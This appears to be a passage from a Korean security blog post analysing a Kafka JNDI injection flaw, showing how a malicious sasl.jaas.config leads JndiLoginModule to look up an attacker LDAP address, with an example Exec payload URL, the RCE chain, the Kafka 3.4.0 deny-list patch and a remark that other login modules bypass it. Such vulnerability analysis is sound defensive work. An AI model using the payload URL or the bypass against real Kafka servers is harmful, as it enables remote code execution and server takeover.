JVM ์•ˆ์—์„œ LoginContext๊ฐ€ JndiLoginModule์„ ์–ด๋–ป๊ฒŒ ํ˜ธ์ถœํ•˜๋Š”์ง€ ๋ด์•ผํ•œ๋‹ค.

Flow

  1. connection string

๊ณต๊ฒฉ์ž๊ฐ€ ์•…์„ฑ sasl.jaas.config ์ฃผ์ž…

  1. set config & login

Kafka client๊ฐ€ ์„ค์ •์„ ์ฝ๊ณ  LoginContext์— ๋กœ๊ทธ์ธ ์š”์ฒญ

  1. instantiate Subject

LoginContext๊ฐ€ Subject(์ธ์ฆ ์ฃผ์ฒด) ๊ฐ์ฒด ์ƒ์„ฑ

  1. construct

LoginContext๊ฐ€ JndiLoginModule ์ƒ์„ฑ

  1. initialize with Subject, CallbackHandler, options

JndiLoginModule ์ดˆ๊ธฐํ™”(์•…์„ฑ LDAP ์ฃผ์†Œ๊ฐ€ options์— ํฌํ•จ๋จ)

  1. Login

JndiLoginModule.login() ํ˜ธ์ถœ

์—ฌ๊ธฐ์„œ ํ•ต์‹ฌ ํฌ์ธํŠธ๋Š” LoginContext๋Š” ์œ„์—์„œ ๋งํ–ˆ๋˜ ๊ฒƒ์ฒ˜๋Ÿผ Java ํ‘œ์ค€ ์ธ์ฆ ํ”„๋ ˆ์ž„์›Œํฌ์ด๋‹ค. ์›๋ž˜๋Š” ์ •์ƒ์ ์ธ ์ธ์ฆ์„ ์œ„ํ•œ ๊ฒƒ์ด์ง€๋งŒ, ์•…์„ฑ LoginModule(JndiLoginModule)์„ ์ฃผ์ž…ํ•˜๋ฉด LoginContextx๊ฐ€ ๊ทธ๊ฑธ ๊ทธ๋Œ€๋กœ ์‹คํ–‰ํ•ด๋ฒ„๋ฆฐ๋‹ค.

JndiLoginModule.login ๋‚ด๋ถ€ ๋™์ž‘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
private void attemptAuthentication(boolean getPasswdFromSharedState) 
    throws LoginException {

    String encryptedPassword = null;

    // username๊ณผ password ๋จผ์ € ๊ฐ€์ ธ์˜ด
    getUsernamePassword(getPasswdFromSharedState);

    try {
        // โ† ํ•ต์‹ฌ ๋ถ€๋ถ„!
        // user.provider.url ๊ฐ’์œผ๋กœ JNDI lookup ์‹คํ–‰
        InitialContext iCtx = new InitialContext();
        ctx = (DirContext)iCtx.lookup(userProvider);
        //                              โ†‘
        //                    ์—ฌ๊ธฐ์— ์•…์„ฑ LDAP ์ฃผ์†Œ๊ฐ€ ๋“ค์–ด๊ฐ
        //    "ldap://localhost/hhylKPnySW/Plain/Exec/eyJjbWQ..."

์œ„์˜ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด userProvider์— ์•…์„ฑ LDAP ์ฃผ์†Œ๊ฐ€ ์‚ฝ์ž…๋œ๋‹ค. ์‹ค์ œ๋กœ ํ•ด๋‹น ์ค„์ด ์‹คํ–‰ ๋˜๋Š” ์ˆœ๊ฐ„

โ†’ ๊ณต๊ฒฉ์ž LDAP ์„œ๋ฒ„์— ์ ‘์† โ†’ ์•…์„ฑ ์ฝ”๋“œ ๋‹ค์šด๋กœ๋“œ โ†’ RCE ๋ฐœ์ƒ

ํ•ต์‹ฌ ํฌ์ธํŠธ๋Š” JndiLoginModule์€ ์›๋ž˜ LDAP ์„œ๋ฒ„์—์„œ ์‚ฌ์šฉ์ž ์ •๋ณด๋ฅผ ๊ฐ€์ ธ์˜ค๋Š” ์šฉ๋„์ด์ง€๋งŒ ๊ทธ LDAP ์ฃผ์†Œ๋ฅผ ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋กœ ๋ฐ”๊พธ๋ฉด ์•…์˜์ ์ธ ํ–‰์œ„๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.

InitialContext.lookup์˜ ์œ„ํ—˜์„ฑ

lookup() ํ•จ์ˆ˜๊ฐ€ ์™œ RCE ์ฒด์ธ์œผ๋กœ ์ด์–ด์ง€๋Š”๊ฐ€?

1
2
3
4
5
6
7
8
"A common sink"
= Risky method

Runtime.exec         โ†’ ๋ช…๋ น์–ด ์ง์ ‘ ์‹คํ–‰
ObjectInputStream.readObject โ†’ ์—ญ์ง๋ ฌํ™”

"Lookup with an untrusted address leads to RCE"
= ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ์ฃผ์†Œ๋กœ lookupํ•˜๋ฉด RCE ๋ฐœ์ƒ

InitialContext lookup flow

Evil server set up โ†’ JNDI url injection

โ†’ InitialContext.lookup

  • your app code(ํ”ผํ•ด์ž ์„œ๋ฒ„)๊ฐ€ Evil JNDI server์— lookup ์š”์ฒญ

โ†’ payload

  • Evil JNDI Server๊ฐ€ ์•…์„ฑ java ๊ฐ์ฒด ๋ฐ˜ํ™˜

โ†’ taken over

  • ํ”ผํ•ด์ž ์„œ๋ฒ„๊ฐ€ ์•…์„ฑ ๊ฐ์ฒด ์‹คํ–‰ โ†’ RCE โ†’ ์„œ๋ฒ„ ์žฅ์•…

lookup() ์ž์ฒด๊ฐ€ ๋ฌธ์ œ๊ฐ€ ์•„๋‹ˆ๋ผ ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ์ฃผ์†Œ๋กœ lookup์„ ํ•˜๋Š” ๊ฒƒ์ด ๋ฌธ์ œ์ด๋‹ค. ๊ณต๊ฒฉ์ž๊ฐ€ ์ฃผ์†Œ๋ฅผ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ์œผ๋ฉด ๊ณต๊ฒฉ์ž ์„œ๋ฒ„์—์„œ ๋ญ๋“  ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

Patch code of cve-2024-25194

kafka 3.4.0์—์„œ๋Š” ์•„๋ž˜์™€ ๊ฐ™์ด ์ฝ”๋“œ๋ฅผ ํŒจ์น˜ํ–ˆ๋‹ค.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// 1๋ฒˆ: ์ฐจ๋‹จํ•  LoginModule ๊ธฐ๋ณธ๊ฐ’ ์„ค์ •
// JndiLoginModule์„ ๊ธฐ๋ณธ์œผ๋กœ ์ฐจ๋‹จ
public static final String DISALLOWED_LOGIN_MODULES_DEFAULT = 
    "com.sun.security.auth.module.JndiLoginModule";

// 3~13๋ฒˆ: LoginModule ์ฐจ๋‹จ ๋กœ์ง
private static void throwIfLoginModuleIsNotAllowed(...) {
    
    // 4~7๋ฒˆ: ์ฐจ๋‹จ ๋ชฉ๋ก ๊ฐ€์ ธ์˜ค๊ธฐ
    // ์‹œ์Šคํ…œ ์„ค์ •์—์„œ ์ฐจ๋‹จ ๋ชฉ๋ก ์ฝ์–ด์˜ด
    // ๊ธฐ๋ณธ๊ฐ’ = JndiLoginModule
    Set<String> disallowedList = Arrays.stream(
        System.getProperty(DISALLOWED_LOGIN_MODULES_CONFIG, 
                          DISALLOWED_LOGIN_MODULES_DEFAULT)
        .split(","))
        .map(String::trim)
        .collect(Collectors.toSet());

    // 8๋ฒˆ: ์‚ฌ์šฉํ•˜๋ ค๋Š” LoginModule ์ด๋ฆ„ ๊ฐ€์ ธ์˜ด
    String loginModuleName = 
        appConfigurationEntry.getLoginModuleName().trim();

    // 9~11๋ฒˆ: โ† ํ•ต์‹ฌ ํŒจ์น˜ ๋กœ์ง
    // ์ฐจ๋‹จ ๋ชฉ๋ก์— ์žˆ์œผ๋ฉด Exception ๋ฐœ์ƒ์‹œ์ผœ์„œ ์‹คํ–‰ ๋ง‰์Œ
    if (disallowedList.contains(loginModuleName)) {
        throw new IllegalArgumentException(
            loginModuleName + " is not allowed.");
    }
}

์œ„์˜ ํŒจ์น˜ ์ฝ”๋“œ์˜ ๋ฌธ์ œ์ ์€ ๋‹จ์ˆœ ์ด๋ฆ„ ๋น„๊ต๋กœ ๋ง‰๊ณ  ์žˆ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค.

โ†’ JndiLoginModule๋งŒ ๋ง‰ํž˜

โ†’ ๋‹ค๋ฅธ LoginModule์€ ์šฐํšŒ ๊ฐ€๋Šฅ

This post is licensed under CC BY 4.0 by the author.